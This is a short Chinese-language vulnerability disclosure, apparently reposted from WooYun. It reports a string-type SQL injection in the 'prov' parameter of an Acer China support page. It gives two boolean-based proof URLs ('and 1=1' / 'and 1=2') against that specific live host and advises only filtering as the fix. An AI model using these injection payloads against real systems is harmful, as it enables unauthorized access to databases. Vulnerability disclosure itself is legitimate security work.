频道栏目
首页 > 资讯 > 网站安全 > 正文

宏基中国sql字符型注入及修复

11-12-02        来源:[db:作者]  
收藏   我要投稿

 

简要描述:

 

http://support.acer.com.cn/newsupport/service/servnetnew.asp?prov=hubei

注入

字符型的

详细说明:


没什么好说了很明显了!

 

漏洞证明:

 

http://support.acer.com.cn/newsupport/service/servnetnew.asp?prov=hubei' and 1=1 and 'x'='x

 

 

http://support.acer.com.cn/newsupport/service/servnetnew.asp?prov=hubei' and 1=2 and 'x'='x

 

 

 

修复方案:过滤吧!

 

作者  公子@乌云

相关TAG标签
上一篇:Serv-U目录跳转
下一篇:新浪香港台湾分站的两个注入及修复
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站